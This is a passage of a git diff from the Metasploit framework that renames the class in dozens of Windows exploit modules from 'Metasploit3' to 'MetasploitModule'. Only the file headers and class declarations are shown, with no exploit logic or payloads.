a/modules/exploits/windows/misc/bopup_comm.rb +++ b/modules/exploits/windows/misc/bopup_comm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index 0da0bbad83..c994706c67 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index e354c56925..d744dd9c5f 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/citrix_streamprocess.rb b/modules/exploits/windows/misc/citrix_streamprocess.rb index 4ddb6beb1f..b67a2c6433 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index f64248b583..e67cc1e95e 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb index 31ed2b4605..5d48e0a692 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb index 66d3145b80..373922133a 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb index 2d36e4ee08..8741273ee4 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index 9130d3ad0a..388c996923 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index c5cc523440..bcc0102e7b 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index ba6caf4a42..5e7b5c8e0b 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb index f3d90b8117..b5c78fb561 100644 --- a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb +++ b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 9c59408ddc..8d61c18476 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 084c331db4..df7c0adc8e 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index f0ccc69f63..d913136f3b 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index d85485c26a..2bcac14761 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index fca3bb11bf..db3949ec51 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/gimp_script_fu.rb b/modules/exploits/windows/misc/gimp_script_fu.rb index 2fa4784861..d5e6c095ef 100644 --- a/modules/exploits/windows/misc/gimp_script_fu.rb +++ b/modules/exploits/windows/misc/gimp_script_fu.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb index 3626d62b2c..cf29c3b2d6 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_crs.rb b/modules/exploits/windows/misc/hp_dataprotector_crs.rb index 7dd833c3c0..d600cbbad1 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_crs.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_crs.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb b/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb index 807267a2c2..2e1c591fd1 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb index 5c85510fb9..c00f1e774e 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb index 0286f2ec02..65676817b8 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb index a61d414c6c..779082e32e 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_imc_uam.rb b/modules/exploits/windows/misc/hp_imc_uam.rb index 8055b0d947..6ba32d2958 100644 --- a/modules/exploits/windows/misc/hp_imc_uam.rb +++ b/modules/exploits/windows/misc/hp_imc_uam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb index fb664c9ae6..28433df647 100644 --- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb +++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_magentservice.rb b/modules/exploits/windows/misc/hp_magentservice.rb index 80b04a5bdc..ef25e2a7b6 100644 --- a/modules/exploits/windows/misc/hp_magentservice.rb +++ b/modules/exploits/windows/misc/hp_magentservice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index b168c6ff5a..6da50b07fa 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index 404dd0458a..f5dbf7bd77 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index f8aeca8a72..e0332ba2a2 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_4.rb b/modules/exploits/windows/misc/hp_omniinet_4.rb index 2670342a6c..4128ceaf0c 100644 --- a/modules/exploits/windows/misc/hp_omniinet_4.rb +++ b/modules/exploits/windows/misc/hp_omniinet_4.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 67a59e7911..a7e2b6619a 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index d9e85a05f9..704f3f28c4 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index 0612f411ef..77ff5cd927 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_isc_attach_database.rb b/modules/exploits/windows/misc/ib_isc_attach_database.rb index 85ad7d3da3..8b90ae8b18 100644 --- a/modules/exploits/windows/misc/ib_isc_attach_database.rb +++ b/modules/exploits/windows/misc/ib_isc_attach_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_isc_create_database.rb b/modules/exploits/windows/misc/ib_isc_create_database.rb index 794f12d3c6..19e55148ad 100644 --- a/modules/exploits/windows/misc/ib_isc_create_database.rb +++ b/modules/exploits/windows/misc/ib_isc_create_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb index ce739237e8..7a177f1417 100644 --- a/modules/exploits/windows/misc/ib_svc_attach.rb +++ b/modules/exploits/windows/misc/ib_svc_attach.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb index 7d538a816f..b3a7e45813 100644 --- a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb +++ b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb index b8b84e1f1c..965e5cc20c 100644 --- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb +++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb index cf81053e33..af43d8f24c 100644 --- a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb +++ b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index 1457cd8de1..6a5f5a1bdb 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/itunes_extm3u_bof.rb b/modules/exploits/windows/misc/itunes_extm3u_bof.rb index e101f6beda..f1f6199933 100644 --- a/modules/exploits/windows/misc/itunes_extm3u_bof.rb +++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb index fc6e775b23..e6aa0aa5eb 100644 --- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb +++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/lianja_db_net.rb b/modules/exploits/windows/misc/lianja_db_net.rb index 9831813bbc..b9e6600298 100644 --- a/modules/exploits/windows/misc/lianja_db_net.rb +++ b/modules/exploits/windows/misc/lianja_db_net.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::RopDb diff --git a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb index 1d451f3d3d..1ce06c4926 100644 --- a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb +++ b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index a856002418..1ca77aead5 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb +++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb index 19c613356f..5bfbbb284b 100644 --- a/modules/exploits/windows/misc/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index c147e4ca8a..fdfaf0add6 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb index 8450f0562a..0d81ba82c5 100644 --- a/modules/exploits/windows/misc/ms07_064_sami.rb +++ b/modules/exploits/windows/misc/ms07_064_sami.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/ms10_104_sharepoint.rb b/modules/exploits/windows/misc/ms10_104_sharepoint.rb index c61e866b07..e021f4f11e 100644 --- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb +++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb index a89f98e2de..ca13a1fbef 100644 --- a/modules/exploits/windows/misc/netcat110_nt.rb +++ b/modules/exploits/windows/misc/netcat110_nt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/nettransport.rb b/modules/exploits/windows/misc/nettransport.rb index 20139031b8..9c93950deb 100644 --- a/modules/exploits/windows/misc/nettransport.rb +++ b/modules/exploits/windows/misc/nettransport.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/nvidia_mental_ray.rb b/modules/exploits/windows/misc/nvidia_mental_ray.rb index 82a4b8f7a3..592f64903d 100644 --- a/modules/exploits/windows/misc/nvidia_mental_ray.rb +++ b/modules/exploits/windows/misc/nvidia_mental_ray.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/poisonivy_bof.rb b/modules/exploits/windows/misc/poisonivy_bof.rb index ed26b02365..92a41a9510 100644 --- a/modules/exploits/windows/misc/poisonivy_bof.rb +++ b/modules/exploits/windows/misc/poisonivy_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index a5637b1b3e..b00e4573e5 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/poppeeper_uidl.rb b/modules/exploits/windows/misc/poppeeper_uidl.rb index ef53ef6207..82bf4b2499 100644 --- a/modules/exploits/windows/misc/poppeeper_uidl.rb +++ b/modules/exploits/windows/misc/poppeeper_uidl.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/realtek_playlist.rb b/modules/exploits/windows/misc/realtek_playlist.rb index 9a477457b6..b1d3e0876d 100644 --- a/modules/exploits/windows/misc/realtek_playlist.rb +++ b/modules/exploits/windows/misc/realtek_playlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb index 54caf13f2d..bd359502e7 100644 --- a/modules/exploits/windows/misc/sap_2005_license.rb +++ b/modules/exploits/windows/misc/sap_2005_license.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb index 0b08956557..99c952ef24 100644 --- a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb +++ b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index 1b536ec7a4..35326a2771 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb index c929b1db48..fb3049aa86 100644 --- a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb +++ b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb index 988b83a081..42ab69a938 100644 --- a/modules/exploits/windows/misc/splayer_content_type.rb +++ b/modules/exploits/windows/misc/splayer_content_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb index 1d1237953b..6975c8e264 100644 --- a/modules/exploits/windows/misc/stream_down_bof.rb +++ b/modules/exploits/windows/misc/stream_down_bof.rb 